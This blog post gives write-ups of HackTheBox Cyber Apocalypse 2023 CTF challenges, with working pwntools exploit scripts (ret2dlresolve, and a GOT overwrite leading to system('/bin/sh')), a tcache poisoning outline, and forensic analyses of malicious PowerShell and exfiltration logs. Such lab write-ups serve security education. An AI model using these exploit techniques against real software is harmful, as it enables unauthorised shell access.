In this post, I have covered HackTheBox Cyber Apocalypse CTF 2023 Writeups in the form of written text and videos.
HackTheBox Questionnaire
It’s time to learn some things about binaries and basic C. Connect to a remote server and answer some questions to get the flag.
Category
Reversing and Buffer Overflow
Methodology
We covered the basic steps to take in order to analyze a binary using tools such as checksec and the GDB debugger. The purpose is to check the binary’s architecture, which protections against shellcode execution it was built with, and whether it is vulnerable to a buffer overflow.
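As an added example (not part of the original post or the challenge files), a pure-Python check that reads the same facts checksec reports for an ELF64 binary: the architecture, whether it is position-independent, and whether the stack is non-executable. The sample image is constructed inline; pass a real binary path to run it on your own file.

```python
import struct

# ELF constants used below (from the ELF64 specification)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551
PF_X = 0x1
MACHINES = {0x03: "i386", 0x28: "ARM", 0x3E: "x86-64", 0xB7: "AArch64"}

def elf_mitigations(image: bytes) -> dict:
    """Report architecture, PIE and NX for a 64-bit little-endian ELF image."""
    if image[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if image[4] != 2 or image[5] != 1:
        raise ValueError("only ELF64 little-endian is handled in this example")
    e_type, e_machine = struct.unpack_from("<HH", image, 16)
    (e_phoff,) = struct.unpack_from("<Q", image, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", image, 54)
    # Without a PT_GNU_STACK header the kernel grants an executable stack,
    # so NX is only reported when the header is present and lacks PF_X.
    nx = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", image, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {
        "arch": MACHINES.get(e_machine, hex(e_machine)),
        "pie": e_type == ET_DYN,  # ET_DYN executables are loaded at a random base
        "nx": nx,
    }

def build_sample_elf(pie: bool, nx: bool) -> bytes:
    """Constructed, header-only x86-64 ELF image used to exercise the checker."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELF64, LE, version 1
    ehdr = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        ET_DYN if pie else ET_EXEC, 0x3E, 1, 0x1040,  # type, machine, version, entry
        64, 0, 0, 64, 56, 1, 64, 0, 0)                # phoff, shoff, flags, ehsize,
                                                      # phentsize, phnum, sh* fields
    stack_flags = 0x6 if nx else 0x7                  # RW stack vs RWX stack
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_sample_elf(pie=True, nx=True)
    print(elf_mitigations(data))
```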
Video Walkthrough
HackTheBox Getting Started
Get ready for the last guided challenge and your first real exploit. It’s time to show your hacking skills.
Methodology
We covered a guided example of exploiting an application vulnerable to a buffer overflow. We generated a payload consisting of ‘A’s to overflow the stack far enough to reach the desired spot.
Category
Reversing and Buffer Overflow
Video Walkthrough
HackTheBox Void
The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.
Methodology
We covered an example of exploiting a buffer overflow vulnerability with the ret2dlresolve method, using pwntools from Python. The method makes the dynamic linker resolve a function of our choice that the binary never imports, which gives us code execution. Since data is a 64-byte char array and read reads up to 200 bytes into it, there is a clear buffer overflow. As a result, we can overwrite the values that lie after the buffer set aside for data and take control of the program’s execution flow.
This time there are only one or two external functions (read), so the binary does not offer many primitives; for instance, there is no function we could use to leak function pointers.
In this situation the ret2dlresolve technique can be applied to exploit the binary. I won’t go into all the specifics of the method. The fundamental idea is to trick the dynamic linker into resolving a function that is not linked into the binary. Since we want to call system(“/bin/sh”), we need the loader to resolve system even though the binary never imports it.
Category
Reversing and Buffer Overflow
Python Code
# Beginning of the code
#!/usr/bin/env python3
import sys
from pwn import *

context.binary = 'void'
rop = ROP(context.binary)
# Fake relocation records that make the loader resolve system() for us
dlresolve = Ret2dlresolvePayload(context.binary, symbol='system', args=['/bin/sh\0'])
# First stage: read the dlresolve structures into a writable address
rop.read(0, dlresolve.data_addr)
rop.raw(rop.ret[0])          # stack alignment before the resolver call
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()

if len(sys.argv) == 1:
    p = context.binary.process()
else:
    host, port = sys.argv[1].split(':')
    p = remote(host, port)

# 64-byte buffer plus saved rbp: 72 bytes of padding before the return address
p.sendline(b'A' * 72 + raw_rop)
p.sendline(dlresolve.payload)
p.interactive()
# End of the code
Video Walkthrough
HackTheBox Control Room
After unearthing the crashed alien spacecraft you have hacked your way into its interior. Nothing seems particularly interesting until you find the spacecraft’s control room. Filled with monitors, buttons and panels this room surely contains a lot of important information, including the coordinates of the underground alien vessels that you’ve been looking for. You decide to start off by booting up the main computer. You hear an uncanny buzzing-like noise and then a monitor lights up requesting you to enter a username. Can you take control of the Control Room?
Methodology
We covered another buffer overflow scenario as part of the Cyber Apocalypse track. This scenario involved a binary that takes user input as a username and assigns it a default privilege. By locating the responsible function we were able to switch to the highest privilege and discover more functions, which led us to the “configure engine” function; it contained an out-of-bounds write vulnerability in two of the variables used in the code. Using this knowledge, we were able to leak memory addresses from the stack, including glibc addresses, and control the execution of the code to get a shell.
Python Code
# Beginning of the code
#!/usr/bin/env python3
import sys
from pwn import *
from typing import Tuple

context.binary = elf = ELF('control_room')
glibc = ELF('libc.so.6', checksec=False)

def get_process():
    # Run the binary locally unless a host:port argument is given
    if len(sys.argv) == 1:
        return elf.process()
    host, port = sys.argv[1].split(':')
    return remote(host, port)

def write_what_where(p, what: Tuple[int, int], where: int):
    # The engine index is not bounds-checked, so an index computed from the
    # target address turns "configure engine" into a 16-byte arbitrary write
    p.sendlineafter(b'Option [1-5]: ', b'1')
    p.sendlineafter(b'Engine number [0-3]: ', str((where - elf.sym.engines) // 16).encode())
    p.sendlineafter(b'Thrust: ', str(what[0]).encode())
    p.sendlineafter(b'Mixture ratio: ', str(what[1]).encode())
    p.sendlineafter(b'Do you want to save the configuration? (y/n) \n> ', b'y')

def main():
    p = get_process()
    p.sendlineafter(b'Enter a username: ', b'A' * 256)
    p.sendlineafter(b'New username size: ', b'256')
    p.sendlineafter(b'Enter your new username: ', b'asdf')
    # Escalate to the highest role, then trigger the out-of-bounds read
    p.sendlineafter(b'Option [1-5]: ', b'5')
    p.sendlineafter(b'New role: ', b'1')
    p.sendlineafter(b'Option [1-5]: ', b'1')
    p.sendlineafter(b'Engine number [0-3]: ', b'9\n')
    p.sendlineafter(b'Do you want to save the configuration? (y/n) \n> ', b'y')
    stack_leak = u64(p.recvuntil(b'\x7f', timeout=1)[-6:].ljust(8, b'\0'))
    p.info(f'Leaked stack address: {hex(stack_leak)}')
    # Redirect exit() to user_edit and free() to printf to get a format-string leak
    write_what_where(p, (elf.sym.user_edit, elf.sym.user_edit), elf.got.exit)
    write_what_where(p, (elf.plt.printf, elf.plt.printf), elf.got.free)
    p.sendlineafter(b'Option [1-5]: ', b'0')
    p.sendlineafter(b'New username size: ', b'200')
    p.sendlineafter(b'Enter your new username: ', b'%3$lx')
    p.recvuntil(b'User updated successfully!\n\n')
    write_addr = int(p.recvline().decode()[:12], 16) - 23
    p.info(f'Leaked write() address: {hex(write_addr)}')
    glibc.address = write_addr - glibc.sym.write
    p.success(f'Glibc base address: {hex(glibc.address)}')
    # Point free() at system() and free a buffer holding "/bin/sh"
    write_what_where(p, (glibc.sym.system, glibc.sym.system), elf.got.free)
    p.sendlineafter(b'Option [1-5]: ', b'0')
    p.sendlineafter(b'New username size: ', b'200')
    p.sendlineafter(b'Enter your new username: ', b'/bin/sh\0')
    p.recv()
    p.interactive()

if __name__ == '__main__':
    main()
# End of the code
Video Walkthrough
HackTheBox Math Door
Pandora is making her way through the ancient city, but she finds herself in a room with only locked doors. One of them looks majestic, and it has lots of hieroglyphs written on its surface. After inspecting it, she realizes it’s all math: the door presents a problem and she has to solve it to go through to the heart of the ancient city. Will you be able to help her?
Methodology
The technique used to solve this challenge is heap exploitation; the method discussed below is tcache poisoning.
Tcache poisoning grants a potential write-what-where primitive. The tcache is also a very exploitable structure because it applies only a few checks, and those can be bypassed easily.
The gist is to arrange heap chunks and modify chunk sizes so that the program flow is redirected into the shellcode or the function we want to execute. We set a new size for the chunk so that it no longer fits in the tcache. When the chunk is freed again, the heap allocator treats it as an unsorted-bin chunk and sets its `fd` and `bk` fields to point to an offset of our choosing.
The goal is to fully control the tcache, which means controlling the chunk at the head of the tcache free list. Eventually the head of the tcache is made to point to a chunk that contains the glibc pointers.
HackTheBox Alien Cradle
In an attempt for the aliens to find more information about the relic, they launched an attack targeting Pandora’s close friends and partners that may know any secret information about it. During a recent incident believed to be operated by them, Pandora located a weird PowerShell script from the event logs, otherwise called PowerShell cradle. These scripts are usually used to download and execute the next stage of the attack. However, it seems obfuscated, and Pandora cannot understand it. Can you help her deobfuscate it?
Methodology
This challenge was fairly easy. A PowerShell script is given that attempts to download files from the web to establish persistence. The script contains the challenge flag, whose characters are separated by plus signs.
Category
Forensics
Video Walkthrough
HackTheBox Extraterrestrial Persistence
There is a rumor that aliens have developed a persistence mechanism that is impossible to detect. After investigating her recently compromised Linux server, Pandora found a possible sample of this mechanism. Can you analyze it and find out how they install their persistence?
Category
Forensics
Methodology
We are given a bash script containing a base64-encoded string which, when decoded, gave the challenge flag.
Video Walkthrough
HackTheBox Packet Cyclone
Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.
Category
Forensics
Methodology
We covered parsing and investigating Windows event logs and Sysmon logs to extract artifacts related to a host compromise. The challenge required extracting the attacker’s email address and password, the cloud storage provider used for exfiltration, and the files/directories that were the target of the exfiltration.
Video Walk-through and Challenge Answers
1. What is the email of the attacker used for the exfiltration process? (for example: name@email.com)
majmeret@protonmail.com
2. What is the password of the attacker used for the exfiltration process?
FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI
3. What is the Cloud storage provider used by the attacker?
Mega
4. What is the ID of the process used by the attackers to configure their tool?
PID is 3820
5. What is the name of the folder the attacker exfiltrated; provide the full path.
C:\Users\Wade\Desktop\Relic_location
6. What is the name of the folder the attacker exfiltrated the files to?
exfiltration
Flag
Flag: HTB{3v3n_3xtr4t3rr3str14l_B31nGs_us3_Rcl0n3_n0w4d4ys}
HackTheBox Artifact Of Dangerous Sighting
Pandora has been using her computer to uncover the secrets of the elusive relic. She has been relentlessly scouring through all the reports of its sightings. However, upon returning from a quick coffee break, her heart races as she notices the Windows Event Viewer tab open on the Security log. This is so strange! Immediately taking control of the situation she pulls out the network cable, takes a snapshot of her machine and shuts it down. She is determined to uncover who could be trying to sabotage her research, and the only way to do that is by diving deep down and following all traces …
Category
Forensics
Methodology
We covered a blue team scenario where we investigated a virtual hard disk snapshot of a Windows system. We examined the PowerShell console history and found traces of a PowerShell script embedded as an alternate data stream in a DLL file. Once extracted, the script turned out to be base64-encoded, interleaved with null bytes, and obfuscated. De-obfuscating it started with decoding the base64 and removing the null bytes using CyberChef. The script was still obfuscated, so we executed every part of it that preceded the pipe character at its end. This produced a sequence of characters that, when executed again with PowerShell, revealed the contents of the script and the flag.
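As an added example (not code from the original post), the clean-up steps described for Alien Cradle and for this challenge in a small Python helper: joining plus-separated string literals, and base64-decoding a blob then dropping the null bytes that UTF-16LE text leaves behind, which also covers the encoded string in the Extraterrestrial Persistence script. The cradle line and the encoded blob are constructed samples, not the challenge files.

```python
import base64
import re

# A chain of single-quoted PowerShell literals joined by '+', e.g. 'H'+'T'+'B'
CONCAT_RE = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")
# Base64 runs long enough to be a payload rather than an ordinary word
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def join_concatenations(script: str) -> str:
    """Replace every 'a'+'b'+'c' chain in a script with the single literal 'abc'."""
    def merge(match):
        parts = re.findall(r"'([^']*)'", match.group(0))
        return "'" + "".join(parts) + "'"
    return CONCAT_RE.sub(merge, script)

def decode_blob(blob: str) -> str:
    """Base64-decode a payload and drop the NUL bytes left by UTF-16LE text.

    Stripping every 0x00 byte is the same operation CyberChef performed in the
    write-up; for ASCII content encoded as UTF-16LE it yields the plain text.
    """
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))  # restore missing padding
    return raw.replace(b"\x00", b"").decode("latin-1")

def extract_payloads(script: str) -> list:
    """Decode every base64-looking run in a bash or PowerShell script."""
    decoded = []
    for blob in B64_RE.findall(script):
        try:
            decoded.append(decode_blob(blob))
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
    return decoded

# Constructed samples (not the challenge files): a cradle-style concatenation and
# a shell line carrying base64 of UTF-16LE text, the form seen in this challenge.
SAMPLE_CRADLE = "$flag = 'H'+'T'+'B'+'{'+'c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'e'+'d'+'}'"
SAMPLE_SCRIPT = "echo " + base64.b64encode(
    "Write-Host 'constructed sample'".encode("utf-16le")).decode() + " | base64 -d"

if __name__ == "__main__":
    print(join_concatenations(SAMPLE_CRADLE))
    print(extract_payloads(SAMPLE_SCRIPT))
```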
Video Walk-through
HackTheBox Relic Maps
Pandora received an email with a link claiming to have information about the location of the relic and attached ancient city maps, but something seems off about it. Could it be rivals trying to send her off on a distraction? Or worse, could they be trying to hack her systems to get what she knows? Investigate the given attachment and figure out what’s going on and get the flag. The link is to http://relicmaps.htb:/relicmaps.one. The document is still live (relicmaps.htb should resolve to your docker instance).
Methodology
We covered a scenario where we downloaded an attachment that turned out to be a Windows .bat file. From inside the bat file we were able to echo the PowerShell commands it executes to the terminal. The PowerShell command contained the encryption key and initialization vector (IV) for AES in CBC mode, which were used to encrypt the actual windows.bat.exe that was executed every time the bat file was opened. Using CyberChef with the decryption key, we were able to decrypt and save the original executable, which contained the flag.
Video Walk-through